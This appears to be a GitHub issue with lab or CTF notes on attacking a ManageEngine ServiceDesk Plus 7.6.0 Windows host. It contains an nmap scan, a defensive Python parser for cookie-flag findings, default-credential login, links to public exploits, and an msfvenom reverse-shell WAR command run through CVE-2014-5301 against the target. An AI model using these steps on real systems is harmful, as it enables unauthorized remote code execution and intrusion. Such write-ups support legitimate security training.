Open WDavid404 opened 1 month ago
```text
PORT     STATE SERVICE       REASON          VERSION
135/tcp  open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  syn-ack ttl 125 Windows Server (R) 2008 Standard 6001 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open  ms-wbt-server syn-ack ttl 125 Microsoft Terminal Service
8080/tcp open  http          syn-ack ttl 125 Apache Tomcat/Coyote JSP engine 1.1
| http-cookie-flags:
|   /:
|     JSESSIONID:
|_      httponly flag not set
|_http-title: ManageEngine ServiceDesk Plus
|_http-server-header: Apache-Coyote/1.1
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
```
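The `http-cookie-flags` finding above (JSESSIONID without HttpOnly) is the kind of result worth triaging automatically. The following is an added example, not code from the original notes or from nmap: it parses nmap's `http-cookie-flags` script output into a findings map and states the Tomcat-side fix. The sample scan text is constructed, with nmap's real indentation, to match the block above.

```python
"""Parse nmap http-cookie-flags output and report cookies missing security flags."""
import re
from typing import Dict, List

# Constructed sample in nmap's normal output format (indentation as nmap prints it).
NMAP_OUTPUT = """\
8080/tcp open  http  syn-ack ttl 125 Apache Tomcat/Coyote JSP engine 1.1
| http-cookie-flags:
|   /:
|     JSESSIONID:
|_      httponly flag not set
|_http-title: ManageEngine ServiceDesk Plus
"""

# Fix for Tomcat-based apps such as ServiceDesk Plus: set useHttpOnly="true" on the
# <Context> in conf/context.xml (default since Tomcat 7), or in a Servlet 3.0 web.xml:
# <session-config><cookie-config><http-only>true</http-only></cookie-config></session-config>
REMEDIATION = {"httponly": 'Tomcat <Context useHttpOnly="true"> or web.xml <http-only>true</http-only>'}


def parse_cookie_flags(text: str) -> Dict[str, Dict[str, List[str]]]:
    """Return {url_path: {cookie_name: [missing_flag, ...]}} from nmap script output."""
    findings: Dict[str, Dict[str, List[str]]] = {}
    in_script = False
    path = cookie = None
    for raw in text.splitlines():
        if not raw.startswith("|"):          # port line or other non-script text
            in_script = False
            continue
        body = raw[1:]
        if body.startswith("_"):             # "|_" marks the last line of a script block
            body = body[1:]
        indent = len(body) - len(body.lstrip(" "))
        content = body.strip()
        if indent <= 1:                      # top-level line: the NSE script header
            in_script = content == "http-cookie-flags:"
            continue
        if not in_script:
            continue
        if content.endswith(":"):            # "/:" is a path, "JSESSIONID:" is a cookie
            name = content[:-1]
            if name.startswith("/"):
                path, cookie = name, None
            else:
                cookie = name
            continue
        m = re.match(r"(\w+) flag not set", content)
        if m and path and cookie:
            findings.setdefault(path, {}).setdefault(cookie, []).append(m.group(1))
    return findings


def remediations(findings: Dict[str, Dict[str, List[str]]]) -> List[str]:
    """One actionable line per missing flag, for the scan report."""
    return [f"{p} {c}: add {f} ({REMEDIATION.get(f, 'set the flag')})"
            for p, cookies in findings.items() for c, flags in cookies.items() for f in flags]
```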
Coyote 1.1 exploit?
Access 8080 --> CMS: ManageEngine ServiceDesk Plus 7.6.0
We can log in using default credentials like administrator:administrator.
Search for a ManageEngine ServiceDesk Plus 7.6.0 exploit -----> https://github.com/PeterSufliarsky/exploits/blob/master/CVE-2014-5301.py and https://www.exploit-db.com/exploits/11793 (woID SQL injection)
We use CVE-2014-5301.py and, according to the comment description in CVE-2014-5301.py:
```sh
msfvenom -p java/shell_reverse_tcp LHOST=192.168.45.222 LPORT=4444 -f war > shell.war
python3 CVE-2014-5301.py 192.168.161.43 8080 administrator administrator shell.war
```
Another method: nmap the SMB port 139/tcp --> CVE-2017-0143
Key points: